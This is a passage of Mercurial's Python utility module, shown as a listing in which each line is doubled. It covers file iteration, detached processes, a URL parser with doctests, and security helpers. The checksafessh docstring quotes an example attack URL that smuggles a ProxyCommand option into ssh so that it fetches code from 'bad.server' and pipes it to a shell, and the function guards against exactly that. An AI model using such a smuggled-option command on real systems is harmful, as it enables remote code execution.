2540 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 def _safeiterfile(fp):
2541 def _safeiterfile(fp):
2542 return iter(fp.readline, '')
2542 return iter(fp.readline, '')
2543 else:
2543 else:
2544 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2544 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 # note: this may block longer than necessary because of bufsize.
2545 # note: this may block longer than necessary because of bufsize.
2546 def _safeiterfile(fp, bufsize=4096):
2546 def _safeiterfile(fp, bufsize=4096):
2547 fd = fp.fileno()
2547 fd = fp.fileno()
2548 line = ''
2548 line = ''
2549 while True:
2549 while True:
2550 try:
2550 try:
2551 buf = os.read(fd, bufsize)
2551 buf = os.read(fd, bufsize)
2552 except OSError as ex:
2552 except OSError as ex:
2553 # os.read only raises EINTR before any data is read
2553 # os.read only raises EINTR before any data is read
2554 if ex.errno == errno.EINTR:
2554 if ex.errno == errno.EINTR:
2555 continue
2555 continue
2556 else:
2556 else:
2557 raise
2557 raise
2558 line += buf
2558 line += buf
2559 if '\n' in buf:
2559 if '\n' in buf:
2560 splitted = line.splitlines(True)
2560 splitted = line.splitlines(True)
2561 line = ''
2561 line = ''
2562 for l in splitted:
2562 for l in splitted:
2563 if l[-1] == '\n':
2563 if l[-1] == '\n':
2564 yield l
2564 yield l
2565 else:
2565 else:
2566 line = l
2566 line = l
2567 if not buf:
2567 if not buf:
2568 break
2568 break
2569 if line:
2569 if line:
2570 yield line
2570 yield line
2571
2571
2572 def iterfile(fp):
2572 def iterfile(fp):
2573 fastpath = True
2573 fastpath = True
2574 if type(fp) is file:
2574 if type(fp) is file:
2575 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2575 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 if fastpath:
2576 if fastpath:
2577 return fp
2577 return fp
2578 else:
2578 else:
2579 return _safeiterfile(fp)
2579 return _safeiterfile(fp)
2580 else:
2580 else:
2581 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2581 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2582 def iterfile(fp):
2582 def iterfile(fp):
2583 return fp
2583 return fp
2584
2584
2585 def iterlines(iterator):
2585 def iterlines(iterator):
2586 for chunk in iterator:
2586 for chunk in iterator:
2587 for line in chunk.splitlines():
2587 for line in chunk.splitlines():
2588 yield line
2588 yield line
2589
2589
2590 def expandpath(path):
2590 def expandpath(path):
2591 return os.path.expanduser(os.path.expandvars(path))
2591 return os.path.expanduser(os.path.expandvars(path))
2592
2592
2593 def hgcmd():
2593 def hgcmd():
2594 """Return the command used to execute current hg
2594 """Return the command used to execute current hg
2595
2595
2596 This is different from hgexecutable() because on Windows we want
2596 This is different from hgexecutable() because on Windows we want
2597 to avoid things opening new shell windows like batch files, so we
2597 to avoid things opening new shell windows like batch files, so we
2598 get either the python call or current executable.
2598 get either the python call or current executable.
2599 """
2599 """
2600 if mainfrozen():
2600 if mainfrozen():
2601 if getattr(sys, 'frozen', None) == 'macosx_app':
2601 if getattr(sys, 'frozen', None) == 'macosx_app':
2602 # Env variable set by py2app
2602 # Env variable set by py2app
2603 return [encoding.environ['EXECUTABLEPATH']]
2603 return [encoding.environ['EXECUTABLEPATH']]
2604 else:
2604 else:
2605 return [pycompat.sysexecutable]
2605 return [pycompat.sysexecutable]
2606 return gethgcmd()
2606 return gethgcmd()
2607
2607
2608 def rundetached(args, condfn):
2608 def rundetached(args, condfn):
2609 """Execute the argument list in a detached process.
2609 """Execute the argument list in a detached process.
2610
2610
2611 condfn is a callable which is called repeatedly and should return
2611 condfn is a callable which is called repeatedly and should return
2612 True once the child process is known to have started successfully.
2612 True once the child process is known to have started successfully.
2613 At this point, the child process PID is returned. If the child
2613 At this point, the child process PID is returned. If the child
2614 process fails to start or finishes before condfn() evaluates to
2614 process fails to start or finishes before condfn() evaluates to
2615 True, return -1.
2615 True, return -1.
2616 """
2616 """
2617 # Windows case is easier because the child process is either
2617 # Windows case is easier because the child process is either
2618 # successfully starting and validating the condition or exiting
2618 # successfully starting and validating the condition or exiting
2619 # on failure. We just poll on its PID. On Unix, if the child
2619 # on failure. We just poll on its PID. On Unix, if the child
2620 # process fails to start, it will be left in a zombie state until
2620 # process fails to start, it will be left in a zombie state until
2621 # the parent wait on it, which we cannot do since we expect a long
2621 # the parent wait on it, which we cannot do since we expect a long
2622 # running process on success. Instead we listen for SIGCHLD telling
2622 # running process on success. Instead we listen for SIGCHLD telling
2623 # us our child process terminated.
2623 # us our child process terminated.
2624 terminated = set()
2624 terminated = set()
2625 def handler(signum, frame):
2625 def handler(signum, frame):
2626 terminated.add(os.wait())
2626 terminated.add(os.wait())
2627 prevhandler = None
2627 prevhandler = None
2628 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2628 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2629 if SIGCHLD is not None:
2629 if SIGCHLD is not None:
2630 prevhandler = signal.signal(SIGCHLD, handler)
2630 prevhandler = signal.signal(SIGCHLD, handler)
2631 try:
2631 try:
2632 pid = spawndetached(args)
2632 pid = spawndetached(args)
2633 while not condfn():
2633 while not condfn():
2634 if ((pid in terminated or not testpid(pid))
2634 if ((pid in terminated or not testpid(pid))
2635 and not condfn()):
2635 and not condfn()):
2636 return -1
2636 return -1
2637 time.sleep(0.1)
2637 time.sleep(0.1)
2638 return pid
2638 return pid
2639 finally:
2639 finally:
2640 if prevhandler is not None:
2640 if prevhandler is not None:
2641 signal.signal(signal.SIGCHLD, prevhandler)
2641 signal.signal(signal.SIGCHLD, prevhandler)
2642
2642
2643 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2643 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2644 """Return the result of interpolating items in the mapping into string s.
2644 """Return the result of interpolating items in the mapping into string s.
2645
2645
2646 prefix is a single character string, or a two character string with
2646 prefix is a single character string, or a two character string with
2647 a backslash as the first character if the prefix needs to be escaped in
2647 a backslash as the first character if the prefix needs to be escaped in
2648 a regular expression.
2648 a regular expression.
2649
2649
2650 fn is an optional function that will be applied to the replacement text
2650 fn is an optional function that will be applied to the replacement text
2651 just before replacement.
2651 just before replacement.
2652
2652
2653 escape_prefix is an optional flag that allows using doubled prefix for
2653 escape_prefix is an optional flag that allows using doubled prefix for
2654 its escaping.
2654 its escaping.
2655 """
2655 """
2656 fn = fn or (lambda s: s)
2656 fn = fn or (lambda s: s)
2657 patterns = '|'.join(mapping.keys())
2657 patterns = '|'.join(mapping.keys())
2658 if escape_prefix:
2658 if escape_prefix:
2659 patterns += '|' + prefix
2659 patterns += '|' + prefix
2660 if len(prefix) > 1:
2660 if len(prefix) > 1:
2661 prefix_char = prefix[1:]
2661 prefix_char = prefix[1:]
2662 else:
2662 else:
2663 prefix_char = prefix
2663 prefix_char = prefix
2664 mapping[prefix_char] = prefix_char
2664 mapping[prefix_char] = prefix_char
2665 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2665 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2666 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2666 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667
2667
2668 def getport(port):
2668 def getport(port):
2669 """Return the port for a given network service.
2669 """Return the port for a given network service.
2670
2670
2671 If port is an integer, it's returned as is. If it's a string, it's
2671 If port is an integer, it's returned as is. If it's a string, it's
2672 looked up using socket.getservbyname(). If there's no matching
2672 looked up using socket.getservbyname(). If there's no matching
2673 service, error.Abort is raised.
2673 service, error.Abort is raised.
2674 """
2674 """
2675 try:
2675 try:
2676 return int(port)
2676 return int(port)
2677 except ValueError:
2677 except ValueError:
2678 pass
2678 pass
2679
2679
2680 try:
2680 try:
2681 return socket.getservbyname(port)
2681 return socket.getservbyname(port)
2682 except socket.error:
2682 except socket.error:
2683 raise Abort(_("no port number associated with service '%s'") % port)
2683 raise Abort(_("no port number associated with service '%s'") % port)
2684
2684
2685 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2685 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2686 '0': False, 'no': False, 'false': False, 'off': False,
2686 '0': False, 'no': False, 'false': False, 'off': False,
2687 'never': False}
2687 'never': False}
2688
2688
2689 def parsebool(s):
2689 def parsebool(s):
2690 """Parse s into a boolean.
2690 """Parse s into a boolean.
2691
2691
2692 If s is not a valid boolean, returns None.
2692 If s is not a valid boolean, returns None.
2693 """
2693 """
2694 return _booleans.get(s.lower(), None)
2694 return _booleans.get(s.lower(), None)
2695
2695
2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2697 for a in string.hexdigits for b in string.hexdigits)
2697 for a in string.hexdigits for b in string.hexdigits)
2698
2698
2699 class url(object):
2699 class url(object):
2700 r"""Reliable URL parser.
2700 r"""Reliable URL parser.
2701
2701
2702 This parses URLs and provides attributes for the following
2702 This parses URLs and provides attributes for the following
2703 components:
2703 components:
2704
2704
2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706
2706
2707 Missing components are set to None. The only exception is
2707 Missing components are set to None. The only exception is
2708 fragment, which is set to '' if present but empty.
2708 fragment, which is set to '' if present but empty.
2709
2709
2710 If parsefragment is False, fragment is included in query. If
2710 If parsefragment is False, fragment is included in query. If
2711 parsequery is False, query is included in path. If both are
2711 parsequery is False, query is included in path. If both are
2712 False, both fragment and query are included in path.
2712 False, both fragment and query are included in path.
2713
2713
2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715
2715
2716 Note that for backward compatibility reasons, bundle URLs do not
2716 Note that for backward compatibility reasons, bundle URLs do not
2717 take host names. That means 'bundle://../' has a path of '../'.
2717 take host names. That means 'bundle://../' has a path of '../'.
2718
2718
2719 Examples:
2719 Examples:
2720
2720
2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 >>> url(b'file:///home/joe/repo')
2725 >>> url(b'file:///home/joe/repo')
2726 <url scheme: 'file', path: '/home/joe/repo'>
2726 <url scheme: 'file', path: '/home/joe/repo'>
2727 >>> url(b'file:///c:/temp/foo/')
2727 >>> url(b'file:///c:/temp/foo/')
2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 >>> url(b'bundle:foo')
2729 >>> url(b'bundle:foo')
2730 <url scheme: 'bundle', path: 'foo'>
2730 <url scheme: 'bundle', path: 'foo'>
2731 >>> url(b'bundle://../foo')
2731 >>> url(b'bundle://../foo')
2732 <url scheme: 'bundle', path: '../foo'>
2732 <url scheme: 'bundle', path: '../foo'>
2733 >>> url(br'c:\foo\bar')
2733 >>> url(br'c:\foo\bar')
2734 <url path: 'c:\\foo\\bar'>
2734 <url path: 'c:\\foo\\bar'>
2735 >>> url(br'\\blah\blah\blah')
2735 >>> url(br'\\blah\blah\blah')
2736 <url path: '\\\\blah\\blah\\blah'>
2736 <url path: '\\\\blah\\blah\\blah'>
2737 >>> url(br'\\blah\blah\blah#baz')
2737 >>> url(br'\\blah\blah\blah#baz')
2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 >>> url(br'file:///C:\users\me')
2739 >>> url(br'file:///C:\users\me')
2740 <url scheme: 'file', path: 'C:\\users\\me'>
2740 <url scheme: 'file', path: 'C:\\users\\me'>
2741
2741
2742 Authentication credentials:
2742 Authentication credentials:
2743
2743
2744 >>> url(b'ssh://joe:xyz@x/repo')
2744 >>> url(b'ssh://joe:xyz@x/repo')
2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 >>> url(b'ssh://joe@x/repo')
2746 >>> url(b'ssh://joe@x/repo')
2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748
2748
2749 Query strings and fragments:
2749 Query strings and fragments:
2750
2750
2751 >>> url(b'http://host/a?b#c')
2751 >>> url(b'http://host/a?b#c')
2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755
2755
2756 Empty path:
2756 Empty path:
2757
2757
2758 >>> url(b'')
2758 >>> url(b'')
2759 <url path: ''>
2759 <url path: ''>
2760 >>> url(b'#a')
2760 >>> url(b'#a')
2761 <url path: '', fragment: 'a'>
2761 <url path: '', fragment: 'a'>
2762 >>> url(b'http://host/')
2762 >>> url(b'http://host/')
2763 <url scheme: 'http', host: 'host', path: ''>
2763 <url scheme: 'http', host: 'host', path: ''>
2764 >>> url(b'http://host/#a')
2764 >>> url(b'http://host/#a')
2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766
2766
2767 Only scheme:
2767 Only scheme:
2768
2768
2769 >>> url(b'http:')
2769 >>> url(b'http:')
2770 <url scheme: 'http'>
2770 <url scheme: 'http'>
2771 """
2771 """
2772
2772
2773 _safechars = "!~*'()+"
2773 _safechars = "!~*'()+"
2774 _safepchars = "/!~*'()+:\\"
2774 _safepchars = "/!~*'()+:\\"
2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776
2776
2777 def __init__(self, path, parsequery=True, parsefragment=True):
2777 def __init__(self, path, parsequery=True, parsefragment=True):
2778 # We slowly chomp away at path until we have only the path left
2778 # We slowly chomp away at path until we have only the path left
2779 self.scheme = self.user = self.passwd = self.host = None
2779 self.scheme = self.user = self.passwd = self.host = None
2780 self.port = self.path = self.query = self.fragment = None
2780 self.port = self.path = self.query = self.fragment = None
2781 self._localpath = True
2781 self._localpath = True
2782 self._hostport = ''
2782 self._hostport = ''
2783 self._origpath = path
2783 self._origpath = path
2784
2784
2785 if parsefragment and '#' in path:
2785 if parsefragment and '#' in path:
2786 path, self.fragment = path.split('#', 1)
2786 path, self.fragment = path.split('#', 1)
2787
2787
2788 # special case for Windows drive letters and UNC paths
2788 # special case for Windows drive letters and UNC paths
2789 if hasdriveletter(path) or path.startswith('\\\\'):
2789 if hasdriveletter(path) or path.startswith('\\\\'):
2790 self.path = path
2790 self.path = path
2791 return
2791 return
2792
2792
2793 # For compatibility reasons, we can't handle bundle paths as
2793 # For compatibility reasons, we can't handle bundle paths as
2794 # normal URLS
2794 # normal URLS
2795 if path.startswith('bundle:'):
2795 if path.startswith('bundle:'):
2796 self.scheme = 'bundle'
2796 self.scheme = 'bundle'
2797 path = path[7:]
2797 path = path[7:]
2798 if path.startswith('//'):
2798 if path.startswith('//'):
2799 path = path[2:]
2799 path = path[2:]
2800 self.path = path
2800 self.path = path
2801 return
2801 return
2802
2802
2803 if self._matchscheme(path):
2803 if self._matchscheme(path):
2804 parts = path.split(':', 1)
2804 parts = path.split(':', 1)
2805 if parts[0]:
2805 if parts[0]:
2806 self.scheme, path = parts
2806 self.scheme, path = parts
2807 self._localpath = False
2807 self._localpath = False
2808
2808
2809 if not path:
2809 if not path:
2810 path = None
2810 path = None
2811 if self._localpath:
2811 if self._localpath:
2812 self.path = ''
2812 self.path = ''
2813 return
2813 return
2814 else:
2814 else:
2815 if self._localpath:
2815 if self._localpath:
2816 self.path = path
2816 self.path = path
2817 return
2817 return
2818
2818
2819 if parsequery and '?' in path:
2819 if parsequery and '?' in path:
2820 path, self.query = path.split('?', 1)
2820 path, self.query = path.split('?', 1)
2821 if not path:
2821 if not path:
2822 path = None
2822 path = None
2823 if not self.query:
2823 if not self.query:
2824 self.query = None
2824 self.query = None
2825
2825
2826 # // is required to specify a host/authority
2826 # // is required to specify a host/authority
2827 if path and path.startswith('//'):
2827 if path and path.startswith('//'):
2828 parts = path[2:].split('/', 1)
2828 parts = path[2:].split('/', 1)
2829 if len(parts) > 1:
2829 if len(parts) > 1:
2830 self.host, path = parts
2830 self.host, path = parts
2831 else:
2831 else:
2832 self.host = parts[0]
2832 self.host = parts[0]
2833 path = None
2833 path = None
2834 if not self.host:
2834 if not self.host:
2835 self.host = None
2835 self.host = None
2836 # path of file:///d is /d
2836 # path of file:///d is /d
2837 # path of file:///d:/ is d:/, not /d:/
2837 # path of file:///d:/ is d:/, not /d:/
2838 if path and not hasdriveletter(path):
2838 if path and not hasdriveletter(path):
2839 path = '/' + path
2839 path = '/' + path
2840
2840
2841 if self.host and '@' in self.host:
2841 if self.host and '@' in self.host:
2842 self.user, self.host = self.host.rsplit('@', 1)
2842 self.user, self.host = self.host.rsplit('@', 1)
2843 if ':' in self.user:
2843 if ':' in self.user:
2844 self.user, self.passwd = self.user.split(':', 1)
2844 self.user, self.passwd = self.user.split(':', 1)
2845 if not self.host:
2845 if not self.host:
2846 self.host = None
2846 self.host = None
2847
2847
2848 # Don't split on colons in IPv6 addresses without ports
2848 # Don't split on colons in IPv6 addresses without ports
2849 if (self.host and ':' in self.host and
2849 if (self.host and ':' in self.host and
2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2851 self._hostport = self.host
2851 self._hostport = self.host
2852 self.host, self.port = self.host.rsplit(':', 1)
2852 self.host, self.port = self.host.rsplit(':', 1)
2853 if not self.host:
2853 if not self.host:
2854 self.host = None
2854 self.host = None
2855
2855
2856 if (self.host and self.scheme == 'file' and
2856 if (self.host and self.scheme == 'file' and
2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2858 raise Abort(_('file:// URLs can only refer to localhost'))
2858 raise Abort(_('file:// URLs can only refer to localhost'))
2859
2859
2860 self.path = path
2860 self.path = path
2861
2861
2862 # leave the query string escaped
2862 # leave the query string escaped
2863 for a in ('user', 'passwd', 'host', 'port',
2863 for a in ('user', 'passwd', 'host', 'port',
2864 'path', 'fragment'):
2864 'path', 'fragment'):
2865 v = getattr(self, a)
2865 v = getattr(self, a)
2866 if v is not None:
2866 if v is not None:
2867 setattr(self, a, urlreq.unquote(v))
2867 setattr(self, a, urlreq.unquote(v))
2868
2868
2869 @encoding.strmethod
2869 @encoding.strmethod
2870 def __repr__(self):
2870 def __repr__(self):
2871 attrs = []
2871 attrs = []
2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 'query', 'fragment'):
2873 'query', 'fragment'):
2874 v = getattr(self, a)
2874 v = getattr(self, a)
2875 if v is not None:
2875 if v is not None:
2876 attrs.append('%s: %r' % (a, v))
2876 attrs.append('%s: %r' % (a, v))
2877 return '<url %s>' % ', '.join(attrs)
2877 return '<url %s>' % ', '.join(attrs)
2878
2878
2879 def __bytes__(self):
2879 def __bytes__(self):
2880 r"""Join the URL's components back into a URL string.
2880 r"""Join the URL's components back into a URL string.
2881
2881
2882 Examples:
2882 Examples:
2883
2883
2884 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2884 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2885 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2885 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2886 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2886 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2887 'http://user:pw@host:80/?foo=bar&baz=42'
2887 'http://user:pw@host:80/?foo=bar&baz=42'
2888 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2888 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2889 'http://user:pw@host:80/?foo=bar%3dbaz'
2889 'http://user:pw@host:80/?foo=bar%3dbaz'
2890 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2890 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2891 'ssh://user:pw@[::1]:2200//home/joe#'
2891 'ssh://user:pw@[::1]:2200//home/joe#'
2892 >>> bytes(url(b'http://localhost:80//'))
2892 >>> bytes(url(b'http://localhost:80//'))
2893 'http://localhost:80//'
2893 'http://localhost:80//'
2894 >>> bytes(url(b'http://localhost:80/'))
2894 >>> bytes(url(b'http://localhost:80/'))
2895 'http://localhost:80/'
2895 'http://localhost:80/'
2896 >>> bytes(url(b'http://localhost:80'))
2896 >>> bytes(url(b'http://localhost:80'))
2897 'http://localhost:80/'
2897 'http://localhost:80/'
2898 >>> bytes(url(b'bundle:foo'))
2898 >>> bytes(url(b'bundle:foo'))
2899 'bundle:foo'
2899 'bundle:foo'
2900 >>> bytes(url(b'bundle://../foo'))
2900 >>> bytes(url(b'bundle://../foo'))
2901 'bundle:../foo'
2901 'bundle:../foo'
2902 >>> bytes(url(b'path'))
2902 >>> bytes(url(b'path'))
2903 'path'
2903 'path'
2904 >>> bytes(url(b'file:///tmp/foo/bar'))
2904 >>> bytes(url(b'file:///tmp/foo/bar'))
2905 'file:///tmp/foo/bar'
2905 'file:///tmp/foo/bar'
2906 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2906 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2907 'file:///c:/tmp/foo/bar'
2907 'file:///c:/tmp/foo/bar'
2908 >>> print(url(br'bundle:foo\bar'))
2908 >>> print(url(br'bundle:foo\bar'))
2909 bundle:foo\bar
2909 bundle:foo\bar
2910 >>> print(url(br'file:///D:\data\hg'))
2910 >>> print(url(br'file:///D:\data\hg'))
2911 file:///D:\data\hg
2911 file:///D:\data\hg
2912 """
2912 """
2913 if self._localpath:
2913 if self._localpath:
2914 s = self.path
2914 s = self.path
2915 if self.scheme == 'bundle':
2915 if self.scheme == 'bundle':
2916 s = 'bundle:' + s
2916 s = 'bundle:' + s
2917 if self.fragment:
2917 if self.fragment:
2918 s += '#' + self.fragment
2918 s += '#' + self.fragment
2919 return s
2919 return s
2920
2920
2921 s = self.scheme + ':'
2921 s = self.scheme + ':'
2922 if self.user or self.passwd or self.host:
2922 if self.user or self.passwd or self.host:
2923 s += '//'
2923 s += '//'
2924 elif self.scheme and (not self.path or self.path.startswith('/')
2924 elif self.scheme and (not self.path or self.path.startswith('/')
2925 or hasdriveletter(self.path)):
2925 or hasdriveletter(self.path)):
2926 s += '//'
2926 s += '//'
2927 if hasdriveletter(self.path):
2927 if hasdriveletter(self.path):
2928 s += '/'
2928 s += '/'
2929 if self.user:
2929 if self.user:
2930 s += urlreq.quote(self.user, safe=self._safechars)
2930 s += urlreq.quote(self.user, safe=self._safechars)
2931 if self.passwd:
2931 if self.passwd:
2932 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2932 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2933 if self.user or self.passwd:
2933 if self.user or self.passwd:
2934 s += '@'
2934 s += '@'
2935 if self.host:
2935 if self.host:
2936 if not (self.host.startswith('[') and self.host.endswith(']')):
2936 if not (self.host.startswith('[') and self.host.endswith(']')):
2937 s += urlreq.quote(self.host)
2937 s += urlreq.quote(self.host)
2938 else:
2938 else:
2939 s += self.host
2939 s += self.host
2940 if self.port:
2940 if self.port:
2941 s += ':' + urlreq.quote(self.port)
2941 s += ':' + urlreq.quote(self.port)
2942 if self.host:
2942 if self.host:
2943 s += '/'
2943 s += '/'
2944 if self.path:
2944 if self.path:
2945 # TODO: similar to the query string, we should not unescape the
2945 # TODO: similar to the query string, we should not unescape the
2946 # path when we store it, the path might contain '%2f' = '/',
2946 # path when we store it, the path might contain '%2f' = '/',
2947 # which we should *not* escape.
2947 # which we should *not* escape.
2948 s += urlreq.quote(self.path, safe=self._safepchars)
2948 s += urlreq.quote(self.path, safe=self._safepchars)
2949 if self.query:
2949 if self.query:
2950 # we store the query in escaped form.
2950 # we store the query in escaped form.
2951 s += '?' + self.query
2951 s += '?' + self.query
2952 if self.fragment is not None:
2952 if self.fragment is not None:
2953 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2953 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2954 return s
2954 return s
2955
2955
2956 __str__ = encoding.strmethod(__bytes__)
2956 __str__ = encoding.strmethod(__bytes__)
2957
2957
2958 def authinfo(self):
2958 def authinfo(self):
2959 user, passwd = self.user, self.passwd
2959 user, passwd = self.user, self.passwd
2960 try:
2960 try:
2961 self.user, self.passwd = None, None
2961 self.user, self.passwd = None, None
2962 s = bytes(self)
2962 s = bytes(self)
2963 finally:
2963 finally:
2964 self.user, self.passwd = user, passwd
2964 self.user, self.passwd = user, passwd
2965 if not self.user:
2965 if not self.user:
2966 return (s, None)
2966 return (s, None)
2967 # authinfo[1] is passed to urllib2 password manager, and its
2967 # authinfo[1] is passed to urllib2 password manager, and its
2968 # URIs must not contain credentials. The host is passed in the
2968 # URIs must not contain credentials. The host is passed in the
2969 # URIs list because Python < 2.4.3 uses only that to search for
2969 # URIs list because Python < 2.4.3 uses only that to search for
2970 # a password.
2970 # a password.
2971 return (s, (None, (s, self.host),
2971 return (s, (None, (s, self.host),
2972 self.user, self.passwd or ''))
2972 self.user, self.passwd or ''))
2973
2973
2974 def isabs(self):
2974 def isabs(self):
2975 if self.scheme and self.scheme != 'file':
2975 if self.scheme and self.scheme != 'file':
2976 return True # remote URL
2976 return True # remote URL
2977 if hasdriveletter(self.path):
2977 if hasdriveletter(self.path):
2978 return True # absolute for our purposes - can't be joined()
2978 return True # absolute for our purposes - can't be joined()
2979 if self.path.startswith(br'\\'):
2979 if self.path.startswith(br'\\'):
2980 return True # Windows UNC path
2980 return True # Windows UNC path
2981 if self.path.startswith('/'):
2981 if self.path.startswith('/'):
2982 return True # POSIX-style
2982 return True # POSIX-style
2983 return False
2983 return False
2984
2984
2985 def localpath(self):
2985 def localpath(self):
2986 if self.scheme == 'file' or self.scheme == 'bundle':
2986 if self.scheme == 'file' or self.scheme == 'bundle':
2987 path = self.path or '/'
2987 path = self.path or '/'
2988 # For Windows, we need to promote hosts containing drive
2988 # For Windows, we need to promote hosts containing drive
2989 # letters to paths with drive letters.
2989 # letters to paths with drive letters.
2990 if hasdriveletter(self._hostport):
2990 if hasdriveletter(self._hostport):
2991 path = self._hostport + '/' + self.path
2991 path = self._hostport + '/' + self.path
2992 elif (self.host is not None and self.path
2992 elif (self.host is not None and self.path
2993 and not hasdriveletter(path)):
2993 and not hasdriveletter(path)):
2994 path = '/' + path
2994 path = '/' + path
2995 return path
2995 return path
2996 return self._origpath
2996 return self._origpath
2997
2997
2998 def islocal(self):
2998 def islocal(self):
2999 '''whether localpath will return something that posixfile can open'''
2999 '''whether localpath will return something that posixfile can open'''
3000 return (not self.scheme or self.scheme == 'file'
3000 return (not self.scheme or self.scheme == 'file'
3001 or self.scheme == 'bundle')
3001 or self.scheme == 'bundle')
3002
3002
3003 def hasscheme(path):
3003 def hasscheme(path):
3004 return bool(url(path).scheme)
3004 return bool(url(path).scheme)
3005
3005
3006 def hasdriveletter(path):
3006 def hasdriveletter(path):
3007 return path and path[1:2] == ':' and path[0:1].isalpha()
3007 return path and path[1:2] == ':' and path[0:1].isalpha()
3008
3008
3009 def urllocalpath(path):
3009 def urllocalpath(path):
3010 return url(path, parsequery=False, parsefragment=False).localpath()
3010 return url(path, parsequery=False, parsefragment=False).localpath()
3011
3011
3012 def checksafessh(path):
3012 def checksafessh(path):
3013 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3013 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3014
3014
3015 This is a sanity check for ssh urls. ssh will parse the first item as
3015 This is a sanity check for ssh urls. ssh will parse the first item as
3016 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3016 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3017 Let's prevent these potentially exploited urls entirely and warn the
3017 Let's prevent these potentially exploited urls entirely and warn the
3018 user.
3018 user.
3019
3019
3020 Raises an error.Abort when the url is unsafe.
3020 Raises an error.Abort when the url is unsafe.
3021 """
3021 """
3022 path = urlreq.unquote(path)
3022 path = urlreq.unquote(path)
3023 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3023 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3024 raise error.Abort(_('potentially unsafe url: %r') %
3024 raise error.Abort(_('potentially unsafe url: %r') %
3025 (path,))
3025 (path,))
3026
3026
3027 def hidepassword(u):
3027 def hidepassword(u):
3028 '''hide user credential in a url string'''
3028 '''hide user credential in a url string'''
3029 u = url(u)
3029 u = url(u)
3030 if u.passwd:
3030 if u.passwd:
3031 u.passwd = '***'
